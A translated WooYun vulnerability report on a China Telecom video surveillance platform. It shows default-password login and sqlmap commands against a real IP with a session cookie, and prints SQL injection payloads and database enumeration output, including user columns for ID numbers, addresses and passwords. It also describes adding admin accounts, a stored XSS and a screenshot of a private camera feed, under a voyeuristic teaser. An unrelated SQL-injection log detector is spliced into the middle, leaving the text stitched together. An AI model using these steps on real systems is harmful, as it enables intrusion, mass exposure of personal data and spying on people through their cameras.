
Vulnerability summary (24 watchers)

Defect ID: wooyun-2014-078416

Title: A China Telecom video surveillance system uses default passwords, and its back end has SQL injection and stored XSS; a large number of accounts and surveillance video feeds are exposed

Affected vendor: China Telecom

Author: kttzd

Submitted: 2014-10-06 22:51

Fix time: 2014-11-20 22:56

Public disclosure time: 2014-11-20 22:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags: (none)

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2014-10-06: Details reported to the vendor; awaiting the vendor's handling
2014-10-11: Vendor has confirmed; details disclosed to the vendor only
2014-10-21: Details disclosed to core white hats and experts in related fields
2014-10-31: Details disclosed to regular white hats
2014-11-10: Details disclosed to intern white hats
2014-11-20: Details disclosed to the public

Brief description:

What? A girl is taking a shower!!

Detailed description:

China Telecom "平安商铺" (Safe Shop) video surveillance system.
Regular user login: http://pa.jsict.com/globeyes/user/index.jsp has no CAPTCHA, so passwords can be brute-forced.
Administrator login: http://pa.jsict.com:8080/globeyes/admin/
The surveillance system's documentation shows that the default passwords for regular users are 123456 and 111222, and a large number of users have never changed them, so accounts can be brute-forced.
I tried logging in with the regular user account test123 and password 123456.
I got in.
I looked around the back end and found nothing usable, and was about to give up, but in the end I found an injection point.....
The back-end injection requires a cookie, so I captured a request to take a look.
Injection:
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27516 AND 2666=2666
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=27516 AND (SELECT 7563 FROM(SELECT COUNT(*),CONCAT(0x7162797871,(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END)),0x716d797371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=27516 AND SLEEP(5)
---
[19:33:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
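The three technique families sqlmap reported above (boolean-based blind, MySQL error-based via FLOOR(RAND(0)*2), time-based via SLEEP) leave recognisable shapes in the web server's access log. The following Python is an added example, not part of the original report or of the globeyes application, that classifies URL-encoded query parameters by those shapes and flags any client that sweeps several families against one parameter; the log lines, timestamps and documentation-range IPs are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One signature per sqlmap technique family reported against vedio_setup.jsp?id= above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema", re.I),
    "time-blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}
# Combined-log-format line: client, two identity fields, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log (documentation-range IPs, not the report's host). The three probe
# lines carry the exact payload shapes sqlmap printed in the report, URL-encoded as a server logs them.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Oct/2014:19:33:14 +0800] "GET /globeyes/user/vedio_setup.jsp?id=27516 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Oct/2014:19:33:15 +0800] "GET /globeyes/user/vedio_setup.jsp?id=27516%20AND%202666%3D2666 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Oct/2014:19:33:16 +0800] "GET /globeyes/user/vedio_setup.jsp?id=27516%20AND%20(SELECT%207563%20FROM(SELECT%20COUNT(*),CONCAT(0x7162797871,(SELECT%20(CASE%20WHEN%20(7563%3D7563)%20THEN%201%20ELSE%200%20END)),0x716d797371,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 812',
    '203.0.113.7 - - [06/Oct/2014:19:33:22 +0800] "GET /globeyes/user/vedio_setup.jsp?id=27516%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '198.51.100.4 - - [06/Oct/2014:19:40:01 +0800] "GET /globeyes/user/load.jsp?PG=1 HTTP/1.1" 200 2048',
]

def classify_param(value):
    """Return the technique families whose signature matches one percent-decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_access_log(lines, numeric_params=("id",)):
    """One finding per suspicious query parameter; a numeric parameter that is not all digits is reported too."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:  # parse_qs has already percent-decoded the value
                techniques = classify_param(value)
                if not techniques and name in numeric_params and not value.isdigit():
                    techniques = ["non-numeric-id"]
                if techniques:
                    findings.append({"ip": m.group("ip"), "path": url.path, "param": name,
                                     "status": m.group("status"), "techniques": techniques})
    return findings

def flag_probing_clients(findings, min_families=2):
    """Clients that exercised two or more technique families against one parameter: a technique sweep, as sqlmap runs by default."""
    seen = {}
    for f in findings:
        seen.setdefault((f["ip"], f["path"], f["param"]), set()).update(f["techniques"])
    return {key: sorted(fams) for key, fams in seen.items() if len(fams) >= min_families}
```

The non-numeric check matters for an endpoint like this one, where id should only ever be an integer: it catches probes whose syntax the three signatures do not cover.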


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" --dbs

available databases [3]:
[*] globeyes
[*] information_schema
[*] test


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes --tables

Database: globeyes
[57 tables]
+----------------------+
| Dswitcher |
| Rdetail |
| user |
| admin |
| admin_log |
| alarm_dispose |
| alarm_setting |
| area |
| child_terminal |
| client_session |
| defence_area |
| dispmsg |
| dispmsg_bak |
| emergency_notify |
| ensure_msg_queue |
| feeset |
| hd_info |
| host_info |
| input_channel |
| maintenance_record |
| manufacturer |
| message_list |
| message_recycle |
| monitor_event |
| multimedia_queue |
| notify_service |
| notify_service_temp |
| partition_list |
| police |
| police_service |
| police_watcher |
| process_info |
| process_list |
| product |
| saveinfo |
| service_monitor |
| session_check |
| sms_log |
| sms_queue |
| software_version |
| storage |
| store_setup |
| system_stat |
| system_status |
| tccs_session |
| terminal |
| terminal_log |
| terminal_online_time |
| terminal_param |
| test_table |
| uptown |
| user_fee |
| user_log |
| user_message |
| voice_log |
| voice_queue |
| watcher_log |
+----------------------+


Admin accounts are in admin, regular users in user.
Let's see how much data is in them.
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --count

Database: globeyes
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 8547 |
+--------+---------+


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T admin --count

Database: globeyes
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 197 |
+-------+---------+


Let's see what is recorded in there.
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --columns

Database: globeyes
Table: user
[37 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| level | tinyint(3) |
| user | varchar(64) |
| address | varchar(255) |
| area_id | int(11) |
| balance | int(11) |
| birthday | varchar(20) |
| check_account | varchar(32) |
| city | varchar(32) |
| country | varchar(32) |
| create_date | varchar(20) |
| disk_size | bigint(20) |
| email | varchar(128) |
| finger_id | varchar(32) |
| fingerid | varchar(32) |
| from_platform | varchar(32) |
| gender | tinyint(4) |
| id | bigint(20) |
| idcard | varchar(24) |
| max_child_num | int(11) |
| max_device | int(11) |
| mobile | varchar(64) |
| mobile_service | tinyint(4) |
| parent_id | bigint(20) |
| password | varchar(128) |
| pay_method | tinyint(4) |
| phone | varchar(64) |
| platform | tinyint(4) |
| province | varchar(32) |
| realname | varchar(64) |
| start_date | varchar(20) |
| status | tinyint(4) |
| stop_date | varchar(20) |
| store_time | int(10) unsigned |
| test_user | tinyint(4) |
| used_space | bigint(20) |
| validate_type | tinyint(4) |
| zip | varchar(8) |
+----------------+------------------+


If this leaked, it would be no different from "checking the water meter" (everyone's real name, ID card number and home address laid out)....

Proof of vulnerability:

Picked a few admin users at random and logged in:

[screenshot: 视频监控.png]
[screenshot: 视频监控02.png]
[screenshot: 视频监控03.png]
[screenshot: 视频监控04.png]
[screenshot: 视频监控05.png]
[screenshot: 视频监控06.png]

Arbitrary admin users can be added:

[screenshot: 视频监控添加用户.png]

The administrator apparently can reset anyone's password at will; not tested.
There is an XSS in the back end under System Management, in the software version release function:

[screenshot: 后台xss.png]

It is reachable from the front end....
http://pa.jsict.com:8080/globeyes/user/load.jsp?PG=1

[screenshot: 后台xss02.png]

Attached: one camera feed.

[screenshot: 监控系统07.png]

Fix recommendation:

You know better than I do.

Copyright notice: when reposting, please credit the source: kttzd@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-10-11 16:42

Vendor reply:

Latest status:

None yet